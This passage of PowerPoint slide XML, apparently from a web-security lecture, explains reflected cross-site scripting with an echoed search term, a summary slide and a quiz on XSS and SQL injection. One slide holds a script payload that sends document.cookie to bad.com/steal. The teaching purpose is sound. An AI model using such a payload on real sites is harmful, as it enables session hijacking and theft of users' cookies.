              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1255548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8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8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8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7" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="803" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="808" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="814" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="820" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="826" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="832" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="835" grpId="0"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="619087"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Echoed input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Shape 839"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3134320"/>
            <a:ext cx="15609094" cy="3739828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Shape 840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757752" y="6848303"/>
            <a:ext cx="10868497" cy="701676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200">
              <a:alpha val="28000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="127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3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Shape 841"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5615123" y="9389381"/>
            <a:ext cx="12664568" cy="33432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200">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt; &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search results</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Results for</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="020002"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Shape 842"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9187553" y="5980947"/>
            <a:ext cx="59315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lstStyle>
          <a:p>
            <a:r>
              <a:t>Input from bad.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Shape 843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8803005" y="8488637"/>
            <a:ext cx="6777991"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t>Result from victim.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3445082527"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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4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4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84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 grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="841" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="842" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="843" grpId="0"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hape 845"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387451" y="464259"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Exploiting echoed input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="Shape 846"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183431" y="3643663"/>
            <a:ext cx="9496674" cy="2886076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200">
              <a:alpha val="28000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="127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3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3600">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     “</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bad.com/steal?c=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     + document.cookie)</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Shape 847"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5615123" y="8042324"/>
            <a:ext cx="12664568" cy="3343276"/>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4200">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt; &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search results</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Results for</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:srgbClr val="020002"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848" name="Shape 848"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3612732" y="12110443"/>
            <a:ext cx="17158543" cy="913711"/>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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Browser would execute this within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849" name="Shape 849"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413475" y="2612462"/>
            <a:ext cx="59315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lstStyle>
          <a:p>
            <a:r>
              <a:t>Input from bad.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Shape 850"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8624416" y="7075926"/>
            <a:ext cx="7587012" cy="913711"/>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r>
              <a:rPr dirty="0"/>
              <a:t>Result from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3333688785"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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4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4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85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8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0" animBg="1" advAuto="0"/>
      <p:bldP spid="847" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="848" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="849" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="850" grpId="0" animBg="1" advAuto="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2" name="Shape 852"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="578358">
              <a:defRPr sz="11088"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Reflected XSS Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="853" name="Shape 853"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> who uses a vulnerable web service that includes parts of URLs it receives in the web page output it generates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack goal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: run script in user’s browser with the same access as provided to the server’s regular scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker tools</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: get user to click on a specially-crafted URL. Optional tool: a server for receiving stolen user information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="598840" indent="-598840" defTabSz="566674">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:defRPr sz="4850"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key trick</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>: Server does not ensure that its output does not contain foreign, embedded scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220799112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8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8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8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0" build="p" bldLvl="5"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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>How are XSS and SQL injection similar?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2727021" y="7550519"/>
            <a:ext cx="19145427" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>They are both attacks that run in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>They are both attacks that run on the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>They both involve stealing private information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>They both happen when user input, intended as data, is treated as code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="520288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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>How are XSS and SQL injection similar?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2727021" y="7550519"/>
            <a:ext cx="19145427" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" indent="-914400" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
